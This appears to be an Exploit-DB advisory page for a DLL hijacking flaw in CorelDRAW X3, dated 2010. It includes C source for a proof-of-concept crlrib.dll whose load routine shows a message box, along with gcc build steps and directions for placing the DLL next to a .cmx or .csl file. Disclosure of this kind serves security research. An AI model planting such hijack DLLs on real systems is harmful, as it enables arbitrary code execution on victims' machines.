CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

vendor:

CorelDRAW X3

by:

Gjoko 'LiquidWorm' Krstic

7,5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: CorelDRAW X3

Affected Version From: X3 v13.0.0.576

Affected Version To: X3 v13.0.0.576

Patch Exists: NO

Related CWE: N/A

CPE: a:corel:coreldraw:13.0.0.576

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows XP Professional SP3 (EN)

2010

CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

CorelDRAW X3 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extensions are .cmx and .csl thru crlrib.dll library. Compile and rename to crlrib.dll, create a file test.cmx or test.csl and put both files in same dir and execute.

Mitigation:

Ensure that the application is running with the least privileges necessary. Ensure that the application is not running with administrative privileges. Ensure that the application is running in a secure environment.

Source

Exploit-DB raw data:

/*

 CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

 Vendor: Corel Corporation
 Product Web Page: http://www.corel.com
 Affected Version: X3 v13.0.0.576

 Summary: Graphic design software for striking visual communication.

 Desc: CorelDRAW X3 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extensions are .cmx and .csl thru crlrib.dll library.

 ----
 gcc -shared -o crlrib.dll coreldrw.c

 Compile and rename to crlrib.dll, create a file test.cmx or test.csl and
 put both files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}